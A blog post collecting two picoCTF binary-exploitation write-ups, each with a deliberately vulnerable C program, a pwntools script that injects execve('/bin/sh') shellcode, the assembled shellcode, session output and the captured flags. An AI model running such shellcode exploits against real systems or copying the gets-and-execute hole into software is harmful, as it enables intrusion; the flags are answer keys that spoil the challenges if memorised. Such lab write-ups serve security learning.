shellcode的一个demo例子

handy-shellcode

Binary Exploitation, 50 points

 

Description:

This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter your shellcode:");
  vuln(buf);

  puts("Thanks! Executing now...");
  
  ((void (*)())buf)();


  puts("Finishing Executing Shellcode. Exiting now...");
  
  return 0;
}

 

Solution:

This challenge is similar to last year's shellcode. We'll use pwntools' "shellcode" module to generate a shellcode:

# First, generate a pwntools template using:
# pwn template --host 2019shell1.picoctf.com --user dvdalt --path /problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af/vuln

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    Canary found
# NX:       NX disabled
# PIE:      No PIE (0x8048000)
# RWX:      Has RWX segments
import os

if shell is not None:
    shell.set_working_directory(os.path.dirname(remote_path))

io = start()

shellcode = shellcraft.sh()
log.info("Shellcode: \n{}".format(shellcode))
io.sendlineafter("Enter your shellcode:", asm(shellcode))

io.interactive()

Output:

root@kali:/media/sf_CTFs/pico/handy-shellcode# python exploit.py
[*] '/media/sf_CTFs/pico/handy-shellcode/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Connecting to 2019shell1.picoctf.com on port 22: Done
[*] dvdalt@2019shell1.picoctf.com:
    Distro    Ubuntu 18.04
    OS:       linux
    Arch:     amd64
    Version:  4.15.0
    ASLR:     Enabled
[+] Opening new channel: 'pwd': Done
[+] Receiving all data: Done (13B)
[*] Closed SSH channel with 2019shell1.picoctf.com
[*] Working directory: '/tmp/tmp.AwgEXes6oj'
[+] Opening new channel: 'ln -s /home/dvdalt/* .': Done
[+] Receiving all data: Done (0B)
[*] Closed SSH channel with 2019shell1.picoctf.com
[*] Working directory: '/problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af'
[+] Starting remote process '/problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af/vuln' on 2019shell1.picoctf.com: pid 3301954
[*] Shellcode:
        /* execve(path='/bin///sh', argv=['sh'], envp=0) */
        /* push '/bin///sh\x00' */
        push 0x68
        push 0x732f2f2f
        push 0x6e69622f
        mov ebx, esp
        /* push argument array ['sh\x00'] */
        /* push 'sh\x00\x00' */
        push 0x1010101
        xor dword ptr [esp], 0x1016972
        xor ecx, ecx
        push ecx /* null terminate */
        push 4
        pop ecx
        add ecx, esp
        push ecx /* 'sh\x00' */
        mov ecx, esp
        xor edx, edx
        /* call execve() */
        push SYS_execve /* 0xb */
        pop eax
        int 0x80
[*] Switching to interactive mode

jhh///sh/bin\x89h����\x814$ri��1Qj\x04Y�Q1j\x0bX̀
Thanks! Executing now...
$ $ ls
flag.txt  vuln    vuln.c
$ $ cat flag.txt
picoCTF{h4ndY_d4ndY_sh311c0d3_5843b402}

shellcode

Binary Exploitation, 200 points

 

Description:

This program executes any input you give it. Can you get a shell?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter a string!");
  vuln(buf);

  puts("Thanks! Executing now...");
  
  ((void (*)())buf)();
     
  return 0;
}

 

Solution:

We'll use pwntools' "shellcode" module to generate a shellcode:

from pwn import *
import argparse
import os

EXECUTABLE = "vuln"
LOCAL_PATH = "./"
REMOTE_PATH = "/problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed/"
SSH_SERVER = "2018shell3.picoctf.com"

def get_process_path(is_ssh = False):
    if is_ssh or os.path.exists(REMOTE_PATH):
        return REMOTE_PATH + EXECUTABLE
    else:
        return LOCAL_PATH + EXECUTABLE

def get_process(ssh_user = None):
    is_ssh = ssh_user is not None
    path = get_process_path(is_ssh)
    params = {"argv": path, "cwd": os.path.dirname(path)}
    if is_ssh:
        s = ssh(host=SSH_SERVER, user=ssh_user)
        p = s.process(**params)
    else:
        p = process(**params)
    return p


parser = argparse.ArgumentParser()
parser.add_argument("-s", "--ssh_user", help="Connect via SSH with the given username")
args = parser.parse_args()

context.binary = get_process_path()
p = get_process(args.ssh_user)
shellcode = shellcraft.sh()
print "Shellcode:"
print shellcode

payload = asm(shellcode)
p.sendlineafter("Enter a string!", payload)
p.interactive()

Output:

root@kali:/media/sf_CTFs/pico/shellcode# python exploit.py --ssh_user=$pico_ssh_user
[*] '/media/sf_CTFs/pico/shellcode/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Connecting to 2018shell3.picoctf.com on port 22: Done
[*] user@2018shell3.picoctf.com:
    Distro    Ubuntu 16.04
    OS:       linux
    Arch:     amd64
    Version:  4.4.0
    ASLR:     Enabled
[+] Starting remote process '/problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed/vuln' on 2018shell3.picoctf.com: pid 94685
Shellcode:
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push '/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80

[*] Switching to interactive mode

jhh///sh/bin\x89h����\x814$ri��1Qj\x04Y�Q1j\x0bX̀
Thanks! Executing now...
$ $ ls
flag.txt  vuln    vuln.c
$ $ cat flag.txt
picoCTF{shellc0de_w00h00_9ee0edd0}$ $ exit
[*] Got EOF while reading in interactive
$
[*] Stopped remote process 'vuln' on 2018shell3.picoctf.com (pid 94685)
[*] Got EOF while sending in interactive

The flag: picoCTF{shellc0de_w00h00_9ee0edd0}

 

posted @ 2020-10-09 23:54  bonelee  阅读(444)  评论(0编辑  收藏  举报